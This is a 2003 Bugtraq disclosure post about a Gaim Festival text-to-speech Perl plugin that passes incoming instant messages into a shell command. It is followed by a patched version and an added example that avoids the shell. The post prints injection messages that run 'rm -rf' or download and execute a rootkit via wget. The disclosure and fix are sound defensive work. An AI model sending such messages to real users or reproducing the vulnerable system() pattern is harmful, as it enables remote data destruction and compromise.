[32075] in bugtraq
Gaim festival plugin exploit
daemon@ATHENA.MIT.EDU (error)
Wed Oct 15 13:52:54 2003
From: error <error@lostinthenoise.net>
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
Message-Id: <1066231795.759.179.camel@localhost>
Date: 15 Oct 2003 17:29:55 +0200
It has come to my attention that people have actually used this example
code for a gaim plugin:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");

sub goodbye {
    AIM::print("Module Unloaded", "Unloaded Festival TTS");
}

sub synthesize {
    my $string = $_[0];
    $string =~ s/\<.*?\>//g;    # strip HTML tags
    $string =~ s/\".*\"//;      # drop text between the first and last double quote
    # the message text is interpolated straight into a /bin/sh command line
    system("echo \"$string\" | /usr/bin/festival --tts");
}
As taken from:
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
This has to be one of the most amusing ways to gain a local user's
privileges I have ever seen by an "Expert (TM)".
Exploit code?
You have a shell through gaim with that.
Just pass it this message (or really any message for that matter):
Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
Or perhaps:
Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x rootkit;./rootkit
Perhaps someone should ask:
"(Is s/[^\w]//g really that hard to do?!)"
So a fixed version would look like this:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");

sub goodbye {
    AIM::print("Module Unloaded", "Unloaded Festival TTS");
}

sub synthesize {
    my $string = $_[0];
    $string =~ s/\<.*?\>//g;    # strip HTML tags
    $string =~ s/\".*\"//;      # drop text between the first and last double quote
    $string =~ s/[^\w]//g;      # keep only word characters, so no shell metacharacters remain
    system("echo \"$string\" | /usr/bin/festival --tts");
}
Just a minor comment, nothing special.
--
error <error@lostinthenoise.net>
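As an added example that is not part of the original post or of the webreference tutorial: the same handler written so that the message never reaches a shell. festival is started with the list form of open and the text is written to its standard input, so quotes and semicolons in a message are spoken as text, and spaces are kept (the s/[^\w]//g fix above discards them together with the punctuation). It assumes festival at /usr/bin/festival and falls back to cat when that path is missing, so the file can be run on its own.

```perl
#!/usr/bin/perl
# Added example, not code from the original post: a synthesize handler
# that never hands the message text to a shell.
use strict;
use warnings;

# Program that speaks the text. In list form each element is a separate
# argv entry, so Perl execs the program directly and /bin/sh is never
# involved; nothing inside the message can end or extend the command.
# Assumption: festival is installed at /usr/bin/festival. When it is
# absent (e.g. running this file by itself) fall back to cat, which
# prints the text that would have been spoken.
my @tts_cmd = -x '/usr/bin/festival'
    ? ('/usr/bin/festival', '--tts')
    : ('cat', '-');

sub synthesize {
    my ($string) = @_;

    # Strip HTML tags, as the original plugin did. No further filtering
    # is needed for safety because the text only travels over a pipe.
    $string =~ s/<.*?>//g;

    # '|-' with a list of two or more elements bypasses the shell.
    open(my $tts, '|-', @tts_cmd)
        or die "cannot run $tts_cmd[0]: $!";
    print $tts "$string\n";
    close($tts) or warn "$tts_cmd[0] exited with status $?\n";

    return $string;    # what was actually sent to the synthesizer
}

# Stand-alone demonstration with a constructed message carrying the same
# kind of shell metacharacters as the messages in the post; they arrive
# at festival (or cat) as plain text.
unless (caller) {
    my $msg  = 'Hello"; echo this is only text; "<b>there</b>';
    my $sent = synthesize($msg);
    print "sent to tts: $sent\n";
}
```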